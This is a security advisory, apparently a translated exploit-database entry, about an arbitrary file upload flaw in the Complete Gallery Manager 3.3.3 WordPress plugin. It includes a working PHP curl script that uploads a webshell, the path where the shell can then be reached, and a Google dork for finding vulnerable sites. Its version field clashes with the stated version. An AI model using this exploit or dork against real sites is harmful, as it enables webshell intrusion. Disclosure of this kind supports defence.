Wordpress Plugin Complete Gallery Manager 3.3.3 - Arbitrary File Upload Vulnerability

影响版本:

====================================

6.6

介绍:

=============

Using Complete Gallery Manager will make it fun and fast to manage and create galleries for your website. 

The plugin enables a wealth of functionality, but just because you can take advantage of its many features, 

doesn’t mean you necessarily should. For each feature you implement you should consider the benefit for 

your users. Don’t make the interface more complex than necessary. Less is more!

We have made it very easy for you to customize basically anything you can imagine. The Isotype Gallery has 

188 different settings you can tweak and the Touch Slider has 146 different settings.

(摘自: https://codecanyon.net/item/complete-gallery-manager-for-wordpress/2418606 )

摘要:

=========

An independent Vulnerability Laboratory Researcher discovered a arbitrary file upload vulnerability in the Wordpress Complete Gallery Manager v3.3.3 plugin.

影响产品:

==================

CodeCanyon

Product: Complete Gallery Manager 3.3.3

等级:

=========

高危

分析:

========

A arbitrary file upload web vulnerability is detected in the CodeCanyon Wordpress Plugin Complete Gallery Manager v3.3.3 Web-Application.

The vulnerability allows remote attackers to upload files via POST method with multiple extensions to unauthorized access them on 

application-side of the service.

The vulnerability is located in the /plugins/complete-gallery-manager/frames/ path when processing to upload via the  upload-images.php 

file own malicious context or webshells. After the upload the remote attacker can access the file with one extension and exchange it with the 

other one to execute for example php codes.

Exploitation of the vulnerability requires no user interaction and also without privilege application user account (no password standard).

Successful exploitation of the vulnerability results in unauthorized path or file access via local file include or arbitrary file upload.

Vulnerable Application(s):

[+] CodeCanyon - Complete Gallery Manager

Vulnerable Module(s):

[+] Image File Upload

Vulnerable File(s):

[+] upload-images.php

Affected Module(s):

[+] Application Index Listing (https://localhost:8000/)

测试证明

=================

The arbitrary file upload web vulnerability can be exploited by remote attackers without user interaction or privileged application user account.

For demonstration or reproduce ...

Vuln page : 

https://wordpress.localhost:8080/wordpress/wp-content/plugins/complete-gallery-manager/frames/upload-images.php

Exploit : 

<?php

$uploadfile="up.php"; 

$ch = curl_init("https://wordpress.localhost:8080/wordpress/wp-content/plugins/complete-gallery-manager/frames/upload-images.php");

curl_setopt($ch, CURLOPT_POST, true);   

curl_setopt($ch, CURLOPT_POSTFIELDS,

array('qqfile'=>"@$uploadfile"));

curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);

$postResult = curl_exec($ch);

curl_close($ch);

print "$postResult";

?>

Shell Upload Access Path : https://wordpress.localhost:8080/wp-content/2013/09/up.php

Google Dork: allinurl:/wp-content/plugins/complete-gallery-manager/

Reference(s):

https://xxx.com/wp-content/plugins/complete-gallery-manager/frames/upload-images.php

https://www.xxx.com/wp-content/plugins/complete-gallery-manager/frames/upload-images.php

https://xxx.org/wp-content/plugins/complete-gallery-manager/frames/upload-images.php

Risk:

=====

The security risk of the arbitrary file upload web vulnerability is estimated as high(+).